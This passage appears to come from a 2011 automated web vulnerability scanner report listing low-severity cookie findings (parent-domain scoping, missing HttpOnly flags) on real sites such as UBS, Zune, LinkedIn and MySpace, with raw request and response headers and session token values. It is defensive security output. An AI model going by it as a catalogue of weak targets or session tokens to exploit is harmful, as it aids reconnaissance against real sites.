Last-Modified: Thu, 17 Jun 2010 12:11:14 GMT
Cache-Control: max-age=1881
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: image/gif
Content-Length: 2617

GIF89ad.&............................................xx'$(.QQ....bb.......KK..........AA....}}USV.::.%%...$!%..........UU.........1.1...`^a.........MKN...)&*......usu..................................
...[SNIP]...
6.28. http://www.ubs.com/1/live/homepage/shared/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/live/homepage/shared/thickbox.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/live/homepage/shared/thickbox.css HTTP/1.1
Host: www.ubs.com
Proxy-Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:00 GMT
Server: Apache
Set-Cookie: www-stats=130ffb6615b.8526e51e; Domain=ubs.com; Path=/; Version=1; HttpOnly
Last-Modified: Thu, 17 Jun 2010 12:08:12 GMT
Cache-Control: max-age=1881
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 4176

/* ----------------------------------------------------------------------------------------------------------------*/
/* ---------->>> global settings needed for thickbox <<<-------------------------
...[SNIP]...
6.29. http://www.zune.net/en-US/legal/codeOfConduct.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/legal/codeOfConduct.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/legal/codeOfConduct.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 27495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.30. http://www.zune.net/en-US/legal/termsofservice.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/legal/termsofservice.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/legal/termsofservice.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S101
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 94559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.31. http://www.zune.net/en-US/press/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/press/default.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/press/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S503
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 33125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.32. http://www.zune.net/en-US/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/support HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.33. http://www.zune.net/en-US/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-US/support/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/support/ HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S501
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 46375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.34. http://www.zune.net/en-us/legal/safety.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/legal/safety.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/legal/safety.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S502
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.35. http://www.zune.net/en-us/newsletter/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/newsletter/default.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/newsletter/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 28717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.36. http://www.zune.net/en-us/products/zuneonxbox/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/products/zuneonxbox/default.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/products/zuneonxbox/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S101
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 30517


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.37. http://www.zune.net/en-us/support/accessibility/default.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zune.net
Path:   /en-us/support/accessibility/default.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/support/accessibility/default.htm HTTP/1.1
Host: www.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 14:05:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S104
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:05:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7. Cookie without HttpOnly flag set  previous  next
There are 46 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

7.1. https://selfservice.ibb.ubs.com/idm/user/ubs/ubs_selfServiceWelcome.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://selfservice.ibb.ubs.com
Path:   /idm/user/ubs/ubs_selfServiceWelcome.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idm/user/ubs/ubs_selfServiceWelcome.jsp HTTP/1.1
Host: selfservice.ibb.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 06 Jul 2011 14:07:45 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.15 mod_perl/1.29 mod_ssl/2.8.14 OpenSSL/0.9.7b
Content-Language: en
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D8A446E01118B6D3FECEC5B8203F8A68; Path=/idm; Secure
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html40/loose.dtd">
<html>
<head>



...[SNIP]...
7.2. http://www.armaniexchange.com/category/womens/sunglasses.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.armaniexchange.com
Path:   /category/womens/sunglasses.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category/womens/sunglasses.do HTTP/1.1
Host: www.armaniexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Wed, 06 Jul 2011 14:07:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:07:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: customer=none; path=/; expires=Fri, 19-Jul-2013 14:07:28 GMT
Set-Cookie: basket=none; path=/; expires=Wed, 20-Jul-2011 14:07:28 GMT
Set-Cookie: JSESSIONID=b4cv-ltssK9foaMX-d; path=/
Content-Length: 174474


        <script language="JavaScript">
// Disable edit cell tab.
parent.editCell.cl
...[SNIP]...
7.3. http://www.armaniexchange.com/storelocator.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.armaniexchange.com
Path:   /storelocator.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storelocator.do HTTP/1.1
Host: www.armaniexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Wed, 06 Jul 2011 14:07:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:07:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: customer=none; path=/; expires=Fri, 19-Jul-2013 14:07:29 GMT
Set-Cookie: basket=none; path=/; expires=Wed, 20-Jul-2011 14:07:29 GMT
Set-Cookie: JSESSIONID=cnJmPlEr-4b-hiMX-d; path=/
Content-Length: 52997


<script language="JavaScript">
// Disable edit cell tab.
parent.editCell.className = "tab-button-dis";

function saveForm() {
location.replace
...[SNIP]...
7.4. http://www.bebo.com/c/share  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/share HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Location: http://www.bebo.com/PleaseSignIn.jsp?Page=c/share&popup=0
Content-Type: text/html; charset=UTF-8
Content-Length: 95
Date: Wed, 06 Jul 2011 11:21:00 GMT
Connection: close
Set-Cookie: bvid=bcfc7676-2f08-4e18-91ba-a0a7a2b05abd|1309951260831; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:00 GMT
Set-Cookie: bdaysession=59cab38c07f11804620907511; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112100; domain=.bebo.com; path=/

The URL has moved <a href="http://www.bebo.com/PleaseSignIn.jsp?Page=c/share&popup=0">here</a>
7.5. http://www.benjaminsterling.com/experiments/jqShuffle/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.benjaminsterling.com
Path:   /experiments/jqShuffle/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experiments/jqShuffle/ HTTP/1.1
Host: www.benjaminsterling.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 06 Jul 2011 11:21:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://benjaminsterling.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b31036217bd54c298a95d5cae2277bf2; path=/
Last-Modified: Wed, 06 Jul 2011 11:21:27 GMT
Location: http://benjaminsterling.com/experiments/jqShuffle/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

7.6. http://www.diigo.com/post  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.diigo.com
Path:   /post

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: www.diigo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Wed, 06 Jul 2011 14:07:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Sat, 02 Jul 2011 10:07:33 GMT
Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Sat, 02 Jul 2011 10:07:33 GMT
Set-Cookie: _smasher_session=a9bd786efe2dc9056666343ce77be031; domain=diigo.com; path=/
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Location: https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost
X-Runtime: 0.00062
Content-Length: 142
Cache-Control: no-cache

<html><body>You are being <a href="https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost">redirected</a>.</body></html>
7.7. http://www.evernote.com/clip.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.evernote.com
Path:   /clip.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clip.action?url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US HTTP/1.1
Host: www.evernote.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: shard=deleteme; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cookieTestValue=1309951281866; Version=1; Max-Age=378432000; Expires=Mon, 03-Jul-2023 11:21:21 GMT; Path=/
Set-Cookie: JSESSIONID=533B63D3D80594249497C75E3B0979D4; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Wed, 06 Jul 2011 11:21:21 GMT
Connection: close
Server: Evernote/1.0
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...
7.8. http://www.linkedin.com/shareArticle  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:93DIfn6pEjjvFpbrPCwqLaeaMjj-1DOra9DURRE1_gdw92SrsI2wg9:1309951282:71f9fdf64b90fac7cb9339589e3ed534ca703d1e"; Version=1; Max-Age=1799; Expires=Wed, 06-Jul-2011 11:51:21 GMT; Path=/
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1274968938822400364"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: bcookie="v=1&96d058ca-285d-4b2d-96c8-f61d525270fc"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 11:21:21 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Wed, 06-Jul-2011 11:53:13 GMT;path=/;httponly
Content-Length: 8493

<!DOCTYPE html>
<html lang="en">
<head>


<script type="text/jav
...[SNIP]...
7.9. http://www.myspace.com/Modules/PostTo/Pages/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: b6a926eb7268a3c3750ad2730c953a9795441bd2feec1fa4
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634455240459655487&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Wed, 13-Jul-2011 11:40:45 GMT; path=/
Set-Cookie: SessionDDF2=ErqkO3ydTaOccqIxl60+kHYCyG0t5ioyReAa6cduhLOm8nYvFSCSuhZtTbrUe7jHEB2KQMtn1NeMim1gRF15jw==; domain=.myspace.com; expires=Sun, 06-Jul-2031 11:40:45 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: My Pet Hamster
Date: Wed, 06 Jul 2011 11:40:45 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...
7.10. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:05:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=hgig1lfiopk95ql3u4pi3mr831; expires=Fri, 29-Jul-2011 17:39:18 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 14:02:03 GMT
ETag: "1a6140a90b059f012afb34dbb1337aac"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7275
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
7.11. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=nckibgvdkif5pk4ruq9eiask34; expires=Fri, 29-Jul-2011 15:10:32 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 11:32:17 GMT
ETag: "88cb710a049c0b384cfdb46952931378"
